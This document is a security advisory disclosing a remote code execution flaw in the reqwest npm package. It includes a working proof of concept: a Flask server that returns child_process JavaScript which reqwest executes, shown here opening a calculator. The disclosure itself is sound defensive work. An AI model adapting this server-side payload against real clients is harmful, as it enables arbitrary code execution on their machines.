Summary

Affected versions of reqwest npm package are vulnerable to remote code execution vulnerability when requesting a malicious URL.

Product

All versions of reqwest npm package.

Impact

This issue may lead to remote code execution if the URL fetched is untrusted input.

Steps to reproduce

  1. Run the following server:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
from flask import Flask, Response
app = Flask(__name__)
 
 
@app.route('/')
def hello():
    resp = Response("Foo bar baz")
    resp.data = 'require("child_process").exec("calc")'
    resp.headers["Content-Type"] = "javascript"
    return resp
    
 
if __name__ == '__main__':
    app.run(host='0.0.0.0', port=5555, debug=True)
  1. Make a get request to the server:
1
2
3
4
5
6
7
8
var reqwest = require('reqwest')
reqwest({
    url: 'http://localhost:5555/'
  , method: 'get'
  , success: function (resp) {
      qwery('#content').html(resp)
    }
})

Expected result:

A calculator will pop up on the server.

Remediation

Currently there is no fix version released.

Credit

This issue was discovered and reported by Checkmarx SCA Security Researcher Yaniv Nizry.

Resources

  1. reqwest npm repository